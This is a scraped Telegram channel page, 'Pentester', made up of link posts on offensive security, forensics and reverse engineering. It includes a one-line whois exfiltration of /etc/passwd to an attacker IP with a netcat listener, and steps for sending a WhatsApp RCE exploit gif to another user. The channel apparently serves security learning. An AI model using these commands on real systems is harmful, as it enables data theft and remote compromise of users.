Pentester – Telegram

Pentester

2.95K subscribers

120 photos

3 videos

163 files

2.77K links

- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security

Download Telegram

About

Blog

Apps

Platform

2.95K subscribers

https://slides.com/securitymb/prototype-pollution-in-kibana/#/

Prototype Pollution in Kibana

Presentation I did for OWASP Poland Day, 14th October 2019

75 views06:51

https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/

Heap Overflows and the iOS Kernel Heap

76 views07:19

https://github.com/sbridgens/OpenVPN-Brute-Forcer

GitHub - sbridgens/OpenVPN-Brute-Forcer: Openvpn password brute forcer

Openvpn password brute forcer. Contribute to sbridgens/OpenVPN-Brute-Forcer development by creating an account on GitHub.

90 views07:32

https://medium.com/@fabs_60995/joern-reborn-f04e74399b2b

In a blog post back in May 2018, we outlined our plans for saving the open-source C/C++ code analyzer “Joern”. Today, we are happy to…

78 views05:51

75 views05:56

Android_Security_Internals_An_In.pdf

180 views05:56

SQL Injection Step By Step:
Part 1:
https://t.co/sKX3RERldM
Part 2:
https://t.co/kS2Qom5DX6

SQL Injection Step By Step Part 1

If you want to learn SQL Injection step by step, then after reading this article will help you to understand SQL Injection step by step…

91 views07:02

https://medium.com/@d0znpp/security-testing-guide-for-json-rest-apis-1-3-38eddba67098

Security testing guide for JSON / REST APIs #1/3

Fuzzing is everything ;) It’s the most useful and resultative hacking technique for sure. At the same time, fuzzing is not just random…

95 views07:20

How to Reverse Engineer an iOS App and macOS Software
https://www.apriorit.com/dev-blog/363-how-to-reverse-engineer-os-x-and-ios-software

How to Reverse Engineer an iOS App - Apriorit

Learn how to reverse engineer an iOS app, break down its components, and understand functionality without source code access for debugging or maintenance.

102 views19:40

The Linux Forensics workshop (labs, slides, forensic images "E01")+talk done at OSDFCon 2019, is now available here: https://t.co/7aeHMNaVQI

ashemery/LinuxForensics

Everything related to Linux Forensics. Contribute to ashemery/LinuxForensics development by creating an account on GitHub.

103 views06:05

https://www.hahwul.com/2019/10/find-subdomain-takeover-with-amass-and-subjack.html?m=1

102 views20:04

Cheatsheet-God:-
Penetration Testing Biggest Reference Bank - OSCP / PTP & PTX Cheatsheet:-

https://t.co/mApUr4FBqW

OlivierLaflamme/Cheatsheet-God

Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - OlivierLaflamme/Cheatsheet-God

131 views18:48

https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/?preview=true

Shielder - Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

The LSP4XML library used by many IDE and editors was affected by an XXE which lead to RCE exploitable by just opening an XML file.

98 views05:14

https://medium.com/@olafhartong/assess-your-data-potential-with-att-ck-datamap-f44884cfed11

Assess your data potential with ATTACK Datamap

While helping clients that chose to work on coverage of the ATT&CK framework I found myself lacking a solid way to represent their options…

89 views20:14

Have limited ways to exfiltrate data? Use Whois!

attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d

victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64

76 views19:05

https://github.com/neex/phuip-fpizdam

GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043

Exploit for CVE-2019-11043. Contribute to neex/phuip-fpizdam development by creating an account on GitHub.

69 views03:36

https://github.com/Edu4rdSHL/findomain

GitHub - Findomain/Findomain: The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP…

The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, ...

70 views03:41

Privesc - Windows batch script that finds misconfiguration issues which can lead to privilege escalation https://t.co/TQacBYeylG

GitHub - enjoiz/Privesc: Windows batch script that finds misconfiguration issues which can lead to privilege escalation.

Windows batch script that finds misconfiguration issues which can lead to privilege escalation. - enjoiz/Privesc

69 views04:10

https://googleprojectzero.blogspot.com/2019/10/ktrw-journey-to-build-debuggable-iphone.html?m=1

KTRW: The journey to build a debuggable iPhone

Posted by Brandon Azad, Project Zero In my role here at Project Zero, I do not use some of the tooling used by some external iOS securit...

78 views04:12

[PoC] CVE-2019-11932 Whatsapp 2.19.216 Remote Code Execution

1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user

https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4

GitHub - dorkerdevil/CVE-2019-11932: double-free bug in WhatsApp exploit poc

double-free bug in WhatsApp exploit poc. Contribute to dorkerdevil/CVE-2019-11932 development by creating an account on GitHub.

87 views04:14

97 views05:23